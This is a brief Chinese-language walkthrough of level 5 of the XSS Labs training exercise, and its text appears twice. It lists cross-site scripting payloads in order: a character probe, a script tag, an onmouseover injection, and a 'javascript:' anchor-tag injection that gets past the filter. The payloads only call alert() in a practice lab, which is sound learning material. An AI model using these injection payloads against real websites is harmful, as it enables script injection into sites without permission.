XSS Labs-Level5题解
一、测试
先试试有没有符号过滤payload:'';!--"<xss>=&{()}
二、尝试攻击
没有什么发现,试试常规payload:<script>alert()</script>
可以看到script被过滤了,再试试onmouseover事件:"onmouseover='alert(1)'
也被过滤了
那么试试a标签,payload:"><a href=javascript:alert()><"
成功!
一、测试
先试试有没有符号过滤payload:'';!--"<xss>=&{()}
二、尝试攻击
没有什么发现,试试常规payload:<script>alert()</script>
可以看到script被过滤了,再试试onmouseover事件:"onmouseover='alert(1)'
也被过滤了
那么试试a标签,payload:"><a href=javascript:alert()><"
成功!
浙公网安备 33010602011771号